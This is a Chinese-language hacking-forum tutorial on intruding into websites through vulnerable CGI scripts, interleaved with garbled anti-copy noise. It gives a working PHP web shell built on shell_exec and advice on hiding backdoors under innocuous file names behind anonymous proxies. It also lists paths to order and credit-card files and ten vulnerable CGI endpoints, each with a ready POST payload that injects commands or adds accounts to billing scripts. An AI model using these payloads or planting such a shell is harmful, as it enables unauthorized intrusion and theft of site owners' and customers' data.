CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
) t0 }: A; r7 J9 b& G$ ]大家好 我是bboyhip  只是一名菜菜的exploiter
" }& p/ q: Z( @很开心来到贵论坛
# f+ d" ]+ j# i6 G9 _$ ?& V这里让我感觉 很有技术交流的感觉
6 X8 f: e* {" E9 g我会长长来玩的
* r" ], y5 W+ W9 v; D6 M, C前言:
) j. M+ S" l0 W" i以下讲解针对欧美日本网站
當我們在做滲透分析的時候 方法有很多
我门都知道 国外伺服器大多是linux 平台
6 F7 O+ d; j. F* o* e+ _所以有很多网站程序有6成都会使用cgi 脚本来管理
目录为/cgi-bin/
1 n' N0 N" L+ r
只是个人在实务上一些经验
写的不好 请多多见谅喔
在这里我简单分为几个部份一定要會的
讲解一下
5 }! [- y' ^4 h+ F让没有基础的人很容易上手

# a3 \% a) Q1 m2 ^% L( W' c& k以下内容跟帖回复才能看到
==============================

第1部份: 何谓Shell?
) l5 F9 E' W- j" ?0 h( v( ]* Q: TShell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
4 \2 g7 i, Z. `/ m5 R0 oA shell is the program which reads user input from the command line and executes actions based upon that input.
  K: g% U: C( i* {意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.
- b! V6 I7 @8 O2 |- U: `
对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
* J# Q2 g$ a$ V7 d# e% @要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.

8 A2 O; x6 M, u% i  U* n& [第2部份: Unix 指令
以下是一些常见及重要的指令:
pwd: 显示当前目录, 即是後门/程式所在的位置
如 /home/www/site.com/cgi-bin/
ls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
% U7 m4 L3 H7 p0 _9 Pls -al :详细列出档案资料(当前目录)
; c- a' Z; T* a7 gls /: 列出根目录
ls /etc: 列出/etc的资料夹及档案
ls ../ -al: 详细列出上一层的资料夹及档案
* ~0 m5 d+ i  ]. i& s, Rcat: 显示档案内容
cat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
0 G  d1 ?- l. i, D, X) Icat /etc/passwd: 显示 /etc/passwd 这个档案的内容
. B  i2 h# a" w/ @6 [$ gwho: 显示谁login 至系统
man: 显示指令用法  
man ls: 显示ls这指令的用法  
mkdir 建立目录
rmdir 删除目录
mv 移动档案
& B  D& D0 V' I/ Trm 删除档案
3 h! {- I: ^: q& t: r
0 G$ S1 K/ S5 M5 r( `第3部份: Shell的使用
! W3 Z; k4 V  z/ {7 R9 ~) h例如:
: s4 c/ f" c+ k$ ahttp://site.com/refer.php
这是我的後门, 原代码如下:
- C+ s) O# N' F  T" g4 D<Form Action="#" Method="POST">
<Input type="text" name="cmd">
$ }* p: T+ |- B<Input type="Submit">
8 E- F$ _# ]2 j, l1 P/ _. G</Form>
<?php
' }+ f2 K) W5 F; v% H- v" U* f+ n+ N, F$cmd = $_POST['cmd'];
$Output = shell_exec($cmd);
echo $Output;
?>
输入pwd, 可得到绝对路径:
  O4 f. @( O& k0 y- R/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com
5 O( y7 c2 ^" M: I* B) K$ _5 A
* J# X- c1 o3 A# K2 a% {第4部份: 注意事项
  D9 ]4 E4 I' Z/ q- 使用匿名代理, 保障自己
- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
1 H7 \1 ?* t& C9 `5 v3 V: \  T- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
* K' }9 ?- r3 Q1 |) ~! p; y, s不容易被发现.
1 T' [; T* }! n; }) X& M- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
针对网站的渗透分析方法太多了
这篇文章的重点是cgi 脚本攻击
所以我用简单的叙述形容
3 ]8 `8 ?# |. C8 G. R开始讲解脚本入侵过程:
5 A  J! J9 W. j, |; a  c$ }' }在这里提供一些方法思路让大家学习一下
- f4 R1 K$ R5 X* N: P4 u/ O  w, a  ^
- j, ?; j+ q( A  q1.一开始对一个网站进行cgi漏洞扫描
3 D, ?9 X, ~" N2 U% \6 d我们需要的东西有
" ^" ?7 S5 q9 Q, A& X扫洞工具 如:triton..等等
! k: @: a9 {9 l* G' U% T" O' rE表
9 B0 w: ]! X: e0 d如
/cgi-bin/add-passwd.cgi
/WebShop/templates/cc.txt
/Admin_files/order.log
/orders/mountain.cfg
9 T0 A) e0 d/ d$ B/cgi-sys/cart.pl
/scripts/cart.pl
/htbin/cart.pl
) g# Q4 Z8 j8 x, s( D+ Q; p- T( b" yE表来源可以是网路收寻或是自己的0 day
8 i4 G4 C# g2 s6 y! M) o
2.怎样确认扫到的洞 是真的还假的?
; ]) q# ^4 O+ [% k$ }举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
一般都是在IE里先看一下的,记住这个返回码哦
% c% K. u$ j: A' w% A8 ~/ \: RERROR:This script should be referenced with a METHOD of POST.
没有返回一定是假的
  ], I7 i4 o  I: I3.重来来了 很多人都会问我
他扫到很多洞 但是不会使用
& S1 T3 R0 H# @! }  F) {因为这些漏洞 使用的语法 称为post
# l9 ~0 V) ?+ Q* i, f! S) S7 i4 z& D我们要找post 的方法很多
& c8 E  k/ d6 l9 P+ C2 |可以是源代码分析 找出介质
或是用抓包工具 抓他的语法...等等
" `, R) L* i. @) S
以下我提供10个 cgi 洞以及使用方法post
# U5 P% _# G$ o! J- q让大家可以针对网站去做扫描  
4 W1 \# q+ y3 `3 d/index.cgi
wei=ren&gen=command
/passmaster.cgi
Action=Add&Username=Username&Password=Password
/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
( D3 K4 t& H1 e) R/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
6 j& ]& s2 B8 A# S+ {( h% A# E/addusr.pl
$ `- q' I! i' l  S/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
, y4 o  I2 f4 }. Y/ccbill-local.asp
post_values=username:password
  r9 V, `8 q  t  T  T1 h  H/count.cgi
1 g; q' I. m7 f2 x$ |0 u9 O" v6 jpinfile=|echo;ls -la;exit|
& v0 A: p3 {- ?. {- [/recon.cgi
/recon.cgi?search
8 ~7 a# Q/ a5 F5 Esearchoption=1&searchfor=|echo;ls -al;exit|
/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
/af.cgi_browser_out=|echo;ls -la;exit;|

" M+ H7 M' T$ w1 d4 n& H& k今天就讲到这  感谢大家支持